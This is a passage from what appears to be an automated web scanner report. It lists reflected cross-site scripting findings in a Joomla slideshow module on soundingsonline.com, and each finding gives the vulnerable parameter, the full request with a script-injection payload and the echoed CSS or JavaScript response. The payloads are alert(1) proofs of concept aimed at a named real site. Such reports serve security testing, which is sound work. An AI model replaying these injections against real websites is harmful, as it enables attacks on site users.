Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
play: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 045c34<script>alert(1)</script>10eff4952b3;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_
...[SNIP]...

4.1407. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_width request parameter is copied into the HTML document as plain text between tags. The payload ef2d2<script>alert(1)</script>2b50e983568 was submitted in the text_block_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195ef2d2<script>alert(1)</script>2b50e983568&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
Arial, Helvetica, sans-serif;
   text-decoration: none;
}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195ef2d2<script>alert(1)</script>2b50e983568px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206
...[SNIP]...

4.1408. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_border parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_border request parameter is copied into the HTML document as plain text between tags. The payload 8fc44<script>alert(1)</script>3359efc16d3 was submitted in the thumbnail_border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=18fc44<script>alert(1)</script>3359efc16d3&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
ws_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 90px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 18fc44<script>alert(1)</script>3359efc16d3px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 452px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_ima
...[SNIP]...

4.1409. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_height request parameter is copied into the HTML document as plain text between tags. The payload 9673e<script>alert(1)</script>59db9d4223c was submitted in the thumbnail_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=449673e<script>alert(1)</script>59db9d4223c&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
gin-left: 10px;
   width: 195px;
   height: 449685px;
   position: absolute;
   left: 405px;
   top: -449425px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66px;
   height: 449673e<script>alert(1)</script>59db9d4223cpx;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolut
...[SNIP]...

4.1410. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_margin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_margin request parameter is copied into the HTML document as plain text between tags. The payload 9dcc8<script>alert(1)</script>ff0b9230bba was submitted in the thumbnail_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=59dcc8<script>alert(1)</script>ff0b9230bba&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 164px;
   position: absolute;
   left: 405px;
   top: 96px;
}

.gk_news_image_1_thumb{
   margin: 59dcc8<script>alert(1)</script>ff0b9230bbapx;
   border: 1px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 748px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

...[SNIP]...

4.1411. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_width request parameter is copied into the HTML document as plain text between tags. The payload ba4ce<script>alert(1)</script>afde6d92280 was submitted in the thumbnail_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66ba4ce<script>alert(1)</script>afde6d92280&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
{
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 56px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66ba4ce<script>alert(1)</script>afde6d92280px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   p
...[SNIP]...

4.1412. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_x request parameter is copied into the HTML document as plain text between tags. The payload 44675<script>alert(1)</script>e58bcc8132a was submitted in the tick_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=40544675<script>alert(1)</script>e58bcc8132a&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
age_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22px;
   left: 40544675<script>alert(1)</script>e58bcc8132apx;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   position: absolute;

...[SNIP]...

4.1413. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_y parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_y request parameter is copied into the HTML document as plain text between tags. The payload a1678<script>alert(1)</script>18a092c8e6e was submitted in the tick_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22a1678<script>alert(1)</script>18a092c8e6e HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...


.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22a1678<script>alert(1)</script>18a092c8e6epx;
   left: 405px;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   positi
...[SNIP]...

4.1414. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_interval parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_interval request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0c62%3balert(1)//1b0eb0bc8a4 was submitted in the animation_interval parameter. This input was echoed as f0c62;alert(1)//1b0eb0bc8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000f0c62%3balert(1)//1b0eb0bc8a4&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000f0c62;alert(1)//1b0eb0bc8a4,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
...[SNIP]...

4.1415. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_speed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_speed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ee3a%3balert(1)//1593c8e07e8 was submitted in the animation_slide_speed parameter. This input was echoed as 2ee3a;alert(1)//1593c8e07e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=5002ee3a%3balert(1)//1593c8e07e8&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":5002ee3a;alert(1)//1593c8e07e8,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_
...[SNIP]...

4.1416. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c5710%3balert(1)//332a1715734 was submitted in the animation_slide_type parameter. This input was echoed as c5710;alert(1)//332a1715734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0c5710%3balert(1)//332a1715734&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0c5710;alert(1)//332a1715734,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inacti
...[SNIP]...

4.1417. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_text_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_text_type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8d26%3balert(1)//5b6a85ca483 was submitted in the animation_text_type parameter. This input was echoed as c8d26;alert(1)//5b6a85ca483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0c8d26%3balert(1)//5b6a85ca483&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0c8d26;alert(1)//5b6a85ca483,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "i
...[SNIP]...

4.1418. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [autoanimation parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the autoanimation request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1874f%3balert(1)//ab4ff2d961a was submitted in the autoanimation parameter. This input was echoed as 1874f;alert(1)//ab4ff2d961a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=11874f%3balert(1)//ab4ff2d961a&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript


try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":11874f;alert(1)//ab4ff2d961a,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_bo
...[SNIP]...

4.1419. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [base_bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the base_bgcolor request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afe3"%3balert(1)//006abc4a1a3 was submitted in the base_bgcolor parameter. This input was echoed as 5afe3";alert(1)//006abc4a1a3 in the application's response.

